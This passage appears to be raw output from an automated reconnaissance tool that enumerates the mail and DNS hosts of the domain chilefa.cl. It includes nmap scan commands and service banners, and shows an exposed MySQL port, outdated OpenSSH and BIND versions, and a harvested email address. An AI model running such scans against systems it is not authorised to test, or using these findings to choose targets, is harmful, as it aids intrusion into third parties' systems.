1043 No zone transfer found on nameserver 162.210.50.254
1044 No zone transfer found on nameserver 108.174.149.181
1045
1046 Checking SPF record...
1047 New IP found: 174.121.227.2
1048
1049 Checking SPF record...
1050
1051 Checking SPF record...
1052
1053 Checking SPF record...
1054 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 46.232.183.0/24, but only the network IP
1055 New IP found: 46.232.183.0
1056 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.83.208.1/20, but only the network IP
1057 New IP found: 23.83.208.1
1058 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 177.153.0.128/25, but only the network IP
1059 New IP found: 177.153.0.128
1060 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 191.252.57.0/25, but only the network IP
1061 New IP found: 191.252.57.0
1062
1063 Checking SPF record...
1064 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 199.10.31.235/32, but only the network IP
1065 New IP found: 199.10.31.235
1066 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 199.10.31.236/32, but only the network IP
1067 New IP found: 199.10.31.236
1068 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 172.255.62.10/32, but only the network IP
1069 New IP found: 172.255.62.10
1070 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 172.255.62.11/32, but only the network IP
1071 New IP found: 172.255.62.11
1072 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 103.18.109.138/32, but only the network IP
1073 New IP found: 103.18.109.138
1074 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 177.153.0.130/32, but only the network IP
1075 New IP found: 177.153.0.130
1076 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 54.214.232.113/32, but only the network IP
1077 New IP found: 54.214.232.113
1078 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 54.245.125.39/32, but only the network IP
1079 New IP found: 54.245.125.39
1080
1081 Checking 1 most common hostnames using system default resolver...
1082 IP: 143.95.110.248 (United States)
1083 HostName: www.chilefa.cl. Type: A
1084
1085 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
1086 Checking netblock 162.210.50.0
1087 Checking netblock 64.233.189.0
1088 Checking netblock 177.153.0.0
1089 Checking netblock 199.10.31.0
1090 Checking netblock 108.174.149.0
1091 Checking netblock 103.18.109.0
1092 Checking netblock 172.255.62.0
1093 Checking netblock 143.95.110.0
1094 Checking netblock 191.252.57.0
1095 Checking netblock 54.245.125.0
1096 Checking netblock 174.121.227.0
1097 Checking netblock 23.83.208.0
1098 Checking netblock 173.194.79.0
1099 Checking netblock 74.125.28.0
1100 Checking netblock 54.214.232.0
1101 Checking netblock 46.232.183.0
1102 Checking netblock 108.177.8.0
1103 Checking netblock 172.253.118.0
1104
1105 Searching for chilefa.cl. emails in Google
1106 cfa@chilefa.cl�
1107 cfa@chilefa.cl.
1108
1109 Checking 21 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
1110 Host 162.210.50.254 is up (proto-unreach ttl 52)
1111 Host 64.233.189.27 is up (echo-reply ttl 41)
1112 Host 177.153.0.128 is down
1113 Host 199.10.31.235 is up (reset ttl 48)
1114 Host 108.174.149.181 is up (echo-reply ttl 52)
1115 Host 103.18.109.138 is up (reset ttl 52)
1116 Host 172.255.62.10 is up (reset ttl 54)
1117 Host 172.255.62.11 is up (echo-reply ttl 54)
1118 Host 143.95.110.248 is up (syn-ack ttl 52)
1119 Host 191.252.57.0 is down
1120 Host 54.245.125.39 is down
1121 Host 174.121.227.2 is down
1122 Host 23.83.208.1 is down
1123 Host 173.194.79.26 is up (echo-reply ttl 46)
1124 Host 74.125.28.26 is up (syn-ack ttl 104)
1125 Host 199.10.31.236 is up (reset ttl 48)
1126 Host 54.214.232.113 is down
1127 Host 46.232.183.0 is down
1128 Host 108.177.8.26 is up (echo-reply ttl 42)
1129 Host 177.153.0.130 is up (reset ttl 48)
1130 Host 172.253.118.27 is up (echo-reply ttl 38)
1131
1132 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
1133 Scanning ip 162.210.50.254 (dns.site5.com (PTR)):
1134 22/tcp open ssh syn-ack ttl 52 OpenSSH 5.3 (protocol 2.0)
1135 | ssh-hostkey:
1136 | 1024 b7:20:18:7f:2c:3d:d8:25:65:9b:73:fd:39:d5:c5:37 (DSA)
1137 |_ 2048 f6:87:b4:b3:91:58:a5:05:f5:82:68:65:69:90:fe:c6 (RSA)
1138 53/tcp open domain syn-ack ttl 52 (unknown banner: Pie is good in moderation :))
1139 | dns-nsid:
1140 |_ bind.version: Pie is good in moderation :)
1141 | fingerprint-strings:
1142 | DNSVersionBindReqTCP:
1143 | version
1144 | bind
1145 |_ good in moderation :)
1146 Scanning ip 64.233.189.27 (tl-in-f27.1e100.net (PTR)):
1147 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1148 | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1149 |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 d4si3191394pgj.25 - gsmtp
1150 | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1151 | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1152 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1153 | Public Key type: rsa
1154 | Public Key bits: 2048
1155 | Signature Algorithm: sha256WithRSAEncryption
1156 | Not valid before: 2020-02-12T11:46:31
1157 | Not valid after: 2020-05-06T11:46:31
1158 | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1159 |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1160 |_ssl-date: 2020-03-02T11:52:25+00:00; -4s from scanner time.
1161 OS Info: Service Info: Host: mx.google.com
1162 |_clock-skew: -4s
1163 Scanning ip 199.10.31.235 ():
1164 Scanning ip 108.174.149.181 (dns2.site5.com (PTR)):
1165 22/tcp open ssh syn-ack ttl 52 OpenSSH 5.3 (protocol 2.0)
1166 | ssh-hostkey:
1167 | 1024 d1:e5:31:c0:40:83:88:b3:7c:08:8e:00:e8:de:d4:4c (DSA)
1168 |_ 2048 19:dc:3a:0e:a7:f0:61:d5:51:a3:46:79:f5:13:aa:78 (RSA)
1169 53/tcp open domain syn-ack ttl 52 (unknown banner: Pie is good in moderation :))
1170 | dns-nsid:
1171 |_ bind.version: Pie is good in moderation :)
1172 | fingerprint-strings:
1173 | DNSVersionBindReqTCP:
1174 | version
1175 | bind
1176 |_ good in moderation :)
1177 Scanning ip 103.18.109.138 ():
1178 Scanning ip 172.255.62.10 ():
1179 Scanning ip 172.255.62.11 ():
1180 Scanning ip 143.95.110.248 (www.chilefa.cl.):
1181WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1182WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1183WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1184WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1185WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1186WARNING: RST from 143.95.110.248 port 26 -- is this port really open?
1187 25/tcp open tcpwrapped syn-ack ttl 52
1188 |_smtp-commands: Couldn't establish connection on port 25
1189 | ssl-cert: Subject: commonName=*.accountservergroup.com
1190 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1191 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1192 | Public Key type: rsa
1193 | Public Key bits: 2048
1194 | Signature Algorithm: sha256WithRSAEncryption
1195 | Not valid before: 2019-08-28T00:00:00
1196 | Not valid after: 2021-11-29T00:00:00
1197 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1198 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1199 |_ssl-date: 2020-03-02T11:54:41+00:00; -4s from scanner time.
1200 26/tcp open smtp syn-ack ttl 52 Exim smtpd 4.91
1201 |_smtp-commands: Couldn't establish connection on port 26
1202 | ssl-cert: Subject: commonName=*.accountservergroup.com
1203 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1204 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1205 | Public Key type: rsa
1206 | Public Key bits: 2048
1207 | Signature Algorithm: sha256WithRSAEncryption
1208 | Not valid before: 2019-08-28T00:00:00
1209 | Not valid after: 2021-11-29T00:00:00
1210 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1211 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1212 53/tcp open domain syn-ack ttl 52 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
1213 | dns-nsid:
1214 |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
1215 80/tcp open http syn-ack ttl 52 nginx 1.14.0
1216 |_http-server-header: nginx/1.14.0
1217 |_http-title: 403 Forbidden
1218 110/tcp open pop3 syn-ack ttl 52 Dovecot pop3d
1219 |_pop3-capabilities: RESP-CODES USER CAPA SASL(PLAIN LOGIN) STLS AUTH-RESP-CODE UIDL TOP PIPELINING
1220 |_ssl-date: 2020-03-02T11:54:45+00:00; -4s from scanner time.
1221 143/tcp open imap syn-ack ttl 52 Dovecot imapd
1222 |_imap-capabilities: STARTTLS LOGIN-REFERRALS OK Pre-login SASL-IR post-login have listed ID ENABLE IMAP4rev1 AUTH=PLAIN more capabilities AUTH=LOGINA0001 IDLE LITERAL+ NAMESPACE
1223 |_ssl-date: 2020-03-02T11:54:44+00:00; -4s from scanner time.
1224 443/tcp open ssl/http syn-ack ttl 52 nginx 1.14.0
1225 |_http-server-header: nginx/1.14.0
1226 |_http-title: 403 Forbidden
1227 | ssl-cert: Subject: commonName=*.accountservergroup.com
1228 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1229 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1230 | Public Key type: rsa
1231 | Public Key bits: 2048
1232 | Signature Algorithm: sha256WithRSAEncryption
1233 | Not valid before: 2019-08-28T00:00:00
1234 | Not valid after: 2021-11-29T00:00:00
1235 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1236 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1237 |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1238 | tls-nextprotoneg:
1239 | h2
1240 |_ http/1.1
1241 465/tcp open ssl/smtps? syn-ack ttl 52
1242 |_smtp-commands: Couldn't establish connection on port 465
1243 | ssl-cert: Subject: commonName=*.accountservergroup.com
1244 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1245 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1246 | Public Key type: rsa
1247 | Public Key bits: 2048
1248 | Signature Algorithm: sha256WithRSAEncryption
1249 | Not valid before: 2019-08-28T00:00:00
1250 | Not valid after: 2021-11-29T00:00:00
1251 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1252 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1253 |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1254 587/tcp open tcpwrapped syn-ack ttl 52
1255 |_smtp-commands: Couldn't establish connection on port 587
1256 | ssl-cert: Subject: commonName=*.accountservergroup.com
1257 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1258 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1259 | Public Key type: rsa
1260 | Public Key bits: 2048
1261 | Signature Algorithm: sha256WithRSAEncryption
1262 | Not valid before: 2019-08-28T00:00:00
1263 | Not valid after: 2021-11-29T00:00:00
1264 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1265 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1266 993/tcp open ssl/imaps? syn-ack ttl 52
1267 |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1268 995/tcp open ssl/pop3s? syn-ack ttl 52
1269 |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1270 3306/tcp open mysql syn-ack ttl 52 MySQL 5.6.41-84.1
1271 | mysql-info:
1272 | Protocol: 10
1273 | Version: 5.6.41-84.1
1274 | Thread ID: 55592206
1275 | Capabilities flags: 63487
1276 | Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsLoadDataLocal, IgnoreSigpipes, LongColumnFlag, ODBCClient, ConnectWithDatabase, LongPassword, SupportsCompression, Speaks41ProtocolNew, FoundRows, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
1277 | Status: Autocommit
1278 | Salt: U?{n5]UqXE3lG_)L"cOB
1279 |_ Auth Plugin Name: mysql_native_password
1280 8080/tcp open http syn-ack ttl 52 nginx 1.14.0
1281 |_http-server-header: nginx/1.14.0
1282 |_http-title: 403 Forbidden
1283 8443/tcp open ssl/http syn-ack ttl 52 nginx 1.14.0
1284 |_http-server-header: nginx/1.14.0
1285 |_http-title: 403 Forbidden
1286 | ssl-cert: Subject: commonName=*.accountservergroup.com
1287 | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1288 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1289 | Public Key type: rsa
1290 | Public Key bits: 2048
1291 | Signature Algorithm: sha256WithRSAEncryption
1292 | Not valid before: 2019-08-28T00:00:00
1293 | Not valid after: 2021-11-29T00:00:00
1294 | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1295 |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1296 |_ssl-date: 2020-03-02T11:54:35+00:00; -4s from scanner time.
1297 | tls-nextprotoneg:
1298 | h2
1299 |_ http/1.1
1300 OS Info: Service Info: Host: uscentral421.accountservergroup.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
1301 |_clock-skew: mean: -3s, deviation: 0s, median: -4s
1302 Scanning ip 173.194.79.26 (eg-in-f26.1e100.net (PTR)):
1303 25/tcp open smtp syn-ack ttl 109 Google gsmtp
1304 | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1305 |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 p10si6275769eja.532 - gsmtp
1306 | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1307 | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1308 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1309 | Public Key type: rsa
1310 | Public Key bits: 2048
1311 | Signature Algorithm: sha256WithRSAEncryption
1312 | Not valid before: 2020-02-12T11:46:31
1313 | Not valid after: 2020-05-06T11:46:31
1314 | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1315 |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1316 |_ssl-date: 2020-03-02T11:57:33+00:00; -4s from scanner time.
1317 OS Info: Service Info: Host: mx.google.com
1318 |_clock-skew: -4s
1319 Scanning ip 74.125.28.26 (pc-in-f26.1e100.net (PTR)):
1320 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1321 | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1322 |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 e3si10053848pjt.12 - gsmtp
1323 | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1324 | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1325 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1326 | Public Key type: rsa
1327 | Public Key bits: 2048
1328 | Signature Algorithm: sha256WithRSAEncryption
1329 | Not valid before: 2020-02-12T11:46:31
1330 | Not valid after: 2020-05-06T11:46:31
1331 | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1332 |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1333 |_ssl-date: 2020-03-02T11:58:02+00:00; -4s from scanner time.
1334 OS Info: Service Info: Host: mx.google.com
1335 |_clock-skew: -4s
1336 Scanning ip 199.10.31.236 ():
1337 Scanning ip 108.177.8.26 (ow-in-f26.1e100.net (PTR)):
1338 25/tcp open smtp syn-ack ttl 105 Google gsmtp
1339 | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1340 |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 d196si6174681oig.268 - gsmtp
1341 | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1342 | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1343 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1344 | Public Key type: rsa
1345 | Public Key bits: 2048
1346 | Signature Algorithm: sha256WithRSAEncryption
1347 | Not valid before: 2020-02-12T11:46:31
1348 | Not valid after: 2020-05-06T11:46:31
1349 | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1350 |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1351 |_ssl-date: 2020-03-02T11:58:38+00:00; -4s from scanner time.
1352 OS Info: Service Info: Host: mx.google.com
1353 |_clock-skew: -4s
1354 Scanning ip 177.153.0.130 ():
1355 Scanning ip 172.253.118.27 (alt1.aspmx.l.google.com):
1356 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1357 | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1358 |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 v15si10803030plo.376 - gsmtp
1359 | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1360 | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1361 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1362 | Public Key type: rsa
1363 | Public Key bits: 2048
1364 | Signature Algorithm: sha256WithRSAEncryption
1365 | Not valid before: 2020-02-12T11:46:31
1366 | Not valid after: 2020-05-06T11:46:31
1367 | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1368 |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1369 |_ssl-date: 2020-03-02T11:59:31+00:00; -4s from scanner time.
1370 OS Info: Service Info: Host: mx.google.com
1371 |_clock-skew: -4s
1372 WebCrawling domain's web servers... up to 50 max links.
1373
1374 + URL to crawl: http://www.chilefa.cl.
1375 + Date: 2020-03-02
1376
1377 + Crawling URL: http://www.chilefa.cl.:
1378 + Links:
1379 + Crawling http://www.chilefa.cl.
1380 + Crawling http://www.chilefa.cl./
1381 + Searching for directories...
1382 + Searching open folders...
1383 + Crawl finished successfully.
1384----------------------------------------------------------------------
1385Summary of http://http://www.chilefa.cl.
1386----------------------------------------------------------------------
1387+ Links crawled:
1388 - http://www.chilefa.cl.
1389 - http://www.chilefa.cl./
1390 Total links crawled: 2
1391
1392+ Links to files found:
1393 Total links to files: 0
1394
1395+ Externals links found:
1396 - http://fonts.googleapis.com/css?family=Droid+Sans:rerular,italic,bold,bolditalic
1397 - http://fonts.googleapis.com/css?family=Droid+Serif:rerular,italic,bold,bolditalic
1398 - http://www.chilefa.cl/
1399 - http://www.chilefa.cl//
1400 - http://www.chilefa.cl/315-2/
1401 - http://www.chilefa.cl/315-2/our-team/
1402 - http://www.chilefa.cl/blog/
1403 - http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/
1404 - http://www.chilefa.cl/chilean-income-tax-return-ty-2018/
1405 - http://www.chilefa.cl/comments/feed/
1406 - http://www.chilefa.cl/contact/
1407 - http://www.chilefa.cl/es/
1408 - http://www.chilefa.cl/es/servicios/
1409 - http://www.chilefa.cl/feed/
1410 - http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/
1411 - http://www.chilefa.cl/our-customers/
1412 - http://www.chilefa.cl/portfolio/audit/
1413 - http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/
1414 - http://www.chilefa.cl/portfolio/financial-planning/
1415 - http://www.chilefa.cl/portfolio/legal-services/
1416 - http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
1417 - http://www.chilefa.cl/portfolio/outsourcing-2/
1418 - http://www.chilefa.cl/portfolio/tax-law-reform/
1419 - http://www.chilefa.cl/portfolio/tax-planning/
1420 - http://www.chilefa.cl/services/
1421 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.8.2
1422 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.8.2
1423 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.8.2
1424 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=3.5.1
1425 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.5
1426 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.5
1427 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.5
1428 - http://www.chilefa.cl/wp-content/themes/trymee/css/fonts.php?ver=1.0.0
1429 - http://www.chilefa.cl/wp-content/themes/trymee/css/ie.css
1430 - http://www.chilefa.cl/wp-content/themes/trymee/css/ieCss3.php
1431 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.isotope.css?ver=1.5.14
1432 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.jPlayer.css?ver=2.1.0
1433 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.prettyPhoto.min.css?ver=3.1.2
1434 - http://www.chilefa.cl/wp-content/themes/trymee/images/social_icons/linkedin.png
1435 - http://www.chilefa.cl/wp-content/themes/trymee/js/css3MediaQueries.min.js?ver=1.0.0
1436 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.cmsmsResponsiveSlider.min.js?ver=1.1.0
1437 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.easing.min.js?ver=1.3.0
1438 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jPlayer.min.js?ver=2.1.0
1439 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jPlayer.playlist.min.js?ver=1.0.0
1440 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jTweetsAnywhere.min.php?ver=1.3.1
1441 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.min.js?ver=1.7.2
1442 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.prettyPhoto.min.js?ver=3.1.2
1443 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.script.js?ver=1.0.0
1444 - http://www.chilefa.cl/wp-content/themes/trymee/js/modernizr.custom.all.min.js?ver=2.5.2
1445 - http://www.chilefa.cl/wp-content/themes/trymee/style.css
1446 - http://www.chilefa.cl/wp-content/uploads/2012/07/1-Torres-Trini-065-150x150.jpg
1447 - http://www.chilefa.cl/wp-content/uploads/2012/07/1-Torres-Trini-065-440x250.jpg
1448 - http://www.chilefa.cl/wp-content/uploads/2012/08/07-DSC05298.jpg
1449 - http://www.chilefa.cl/wp-content/uploads/2012/08/11-DSC05486-001-440x250.jpg
